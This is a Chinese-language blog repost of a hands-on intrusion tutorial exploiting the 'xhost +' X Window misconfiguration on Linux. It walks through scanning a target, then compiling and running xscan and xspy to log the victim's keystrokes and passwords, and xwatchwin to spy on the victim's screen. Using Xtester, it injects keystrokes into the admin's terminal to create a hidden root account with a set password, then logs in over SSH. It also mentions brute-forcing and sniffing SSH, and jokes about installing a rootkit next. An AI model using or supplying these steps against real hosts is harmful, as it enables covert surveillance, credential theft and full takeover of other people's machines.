利用X-window配置错误入侵Linux

鬼仔注:本来是PDF的,我给转换了下,更方便看,文章末尾有PDF原版的下载地址。

来源:Information Security Technology Organization

Author:Mickey
MSN:54mickey _At_ Gmail.com

常见的漏洞分为软件漏洞和配置漏洞,软件漏洞的挖掘需要扎实的编程功底和对操作系统原理的深入理解;
配置漏洞通常是由于管理员的自身知识的不足造成的。在 Linux 环境下,X Window 是用来显示图形界面应用程序的底层系统,X Window 服务的认证通常分为 xhost 和 xauth 认证,xhost 认证的配置方法比较简便,只需在 xhost 命令后使用+或-选项来分别表示允许或拒绝某个主机访问本地的 X Window 服务就可以了。比如:"xhost +192.168.0.88"  就表示允许  IP 地址为  192.168.0.88 的机器访问本地的  X Window 服务 , "Xhost -192.168.0.88"  则表示禁止 IP 地址为 192.168.0.88 的机器访问本地的 X Window 服务,可是如果当管理员配置不当,配置成"xhost +"这样的通配符方式后,就表示允许任意 IP 地址的主机来访问本地的 X Window 服务,这样的配置是很危险的,远程攻击者可以利用管理员的这个配置漏洞,结合其他的系统服务,轻易的拿到主
机的最高权限。

一.查点

先来对目标机器进行端口扫描,了解开放的服务。在 Linux 环境下,我选择的 Nmap 这个扫描之王。扫描结果如图 1 所示:

图 1

通过 Nmap 返回的扫描结果,可以得知主机开放了 SSH 服务(22 端口),X Window 服务(6000 端口)。此时的入侵思路有 2 个,一是通过对 SSH 服务的暴力破解得到主机访问权限,或者如果主机的 SSH 服务采用的版本为 V1,也可以使用 Cain 或 Ettercap 工具对其进行嗅探攻击,从而得到明文连接密码;二是看看 X Window服务配置是否正确,如果管理员配置不当,那我们的入侵就简单多了。

xscan 是一款在评估 X Window 服务时,最常用的一款扫描工具,该工具可以快速识别一个网段或一台主机的 X window 服务当采用 xhost 认证方法时,激活了+通配符(xhost +)这种配置错误的主机。Linux 下的许多工具都是采用源码形式发布的,所以我们首先需要编译下。命令如下:
tar -zxf xscan.tar.gz
gcc xscan.c snoop.c -o xscan -L/usr/X11R6/lib -lX11

xscan 的使用非常简单,在 xscan 后输入要扫描的独立 IP 地址或 IP 网段就可以了。命令如下:

./xscan 192.168.0.144

效果如图 2 所示:

图 2

通过 xscan 的扫描结果,可以看到该工具已经连接到了主机 192.168.0.144 的 X window 服务,并开始捕获192.168.0.144 这台主机的击键信息,并把记录保存到 KEYLOG192.168.0.144:0.0 文件中。

二.入侵

从上面对主机的查点,得知了 192.168.0.144 这台主机 X window 服务的 xhost 认证配置不当,我们可以使用 xwininfo 这款工具,实时的监控 192.168.0.144 主机的屏幕,了解目标主机的一举一动。xwatchwin 也是采用源码的形式发布的,编译命令如下:

tar -zxf xwatchwin.tar.Z
cc -O xwatchwin.c -o xwatchwin -L/usr/X11R6/lib -lX11

当使用 xwatchwin 时,需要本地的 Linux 平台已经进入图形界面了,否则该工具无法成功使用。工具的使用命令如下:

./xwatchwin 192.168.0.144 root

输入完上面的命令的后,就会弹出一个窗口,我们就可以实时的监视 192.168.0.144 这台主机的一举一动了,效果如图 3 所示:

图 3

如果只想知道目标主机的击键情况 ,也为了节省带宽 ,又或者当目标主机的管理员键入的密码被显示为*号字符(登录邮箱,论坛)时,可以使用 xspy 这款工具,实时的记录目标主机的键盘记录,从而得到敏感的信息,方便我们进一步入侵。在编译 xspy 的时候,如果你的 Linux 主机已经包括了 usleep 函数,需要修改下Imakefile 文件,把其中的 usleep.c 和 usleep.o 删除,这样才能正常的编译。如图 4:

图 4

编译命令为:
xmkmf;make

使用方法为:
./xspy -display 192.168.0.144:0

这时你就可以看到目标主机的管理员的键盘记录信息了。如图 5:

图 5

通过对 192.168.0.144 这台主机的实时监视过程中,我发现管理员大部分时间只是上网冲浪,配合 xspy 的键盘记录,我得到了管理员的邮箱密码,但是当尝试使用 SSH 登录的时候,帐号并不正确。又等了好久,发现管理员打开了一个终端命令行,正在配置 Apache 的相关信息,我们的机会来了,可以通过 Xtester 这款工具直接发送添加管理员的命令到目标主机的终端命令行窗口,然后再登录 SSH。
编译 Xtester.c 的时候,程序作者并没有把  C 文件的相关头文件包含进代码中 ,所以需要我们手动添加下,如图 6:

图 6

xtester 的编译命令如下:

gcc xtester.c-o xtester -lXtst -lX11 -L/usr/X11R6/lib

使用 Xtester 前,需要知道终端命令行窗口的十六进制的 ID 值,可以使用 Linux 系统自带的 xwininfo 得到。
命令如下:

xwininfo -tree -root -display 192.168.0.144 |grep -i konsole

通过 grep 过滤出目标主机的终端命令行(konsole)窗口的 ID 值为 0x1e00008,就可以使用 Xtester 来发送我们的击键到这个窗口了。命令如下:

./xtester 0x1e00008 192.168.0.144:0

输入完上述命令后,会弹出一个小窗口,此时就可以输入添加管理员的命令了,现在的输入是没有回显的,所以要仔细输入。我的经验是输入每次命令前和命令后多按几次回车,可以增加成功率。Linux 下添加系统管理员的命令如下:

useradd -g 0 -u 0 -o mickey
echo mickey:minnie |chpasswd

这两条命令的意思为:添加一个具有 root 权限的用户名为 mickey,密码为 minnie 的系统帐号。效果如图 7:

图 7

现在就可以使用 SSH 登录了,命令如下:

ssh -l mickey -T 192.168.0.144

效果如图 8 所示:

图 8

至此我们就轻易的得到了目标主机的最高权限了。接下来安装 rootkit 的工作我就不做了。:-)

三.结束语
可以看出 Linux 下的入侵,对我等小菜来说,主要难点还是编译利用代码 ,我在编译代码的时候经常出现错误,不是找不到相关的库文件路径,就是程序本身的代码缺少头文件或分号语句结束,这时候可以去 Google下,得到相关的帮助。我也是刚学 Linux,如果有错误的地方,还请各位高手斧正。

PDF下载地址:Pt_misconfig_x-window.pdf

相关日志

发表评论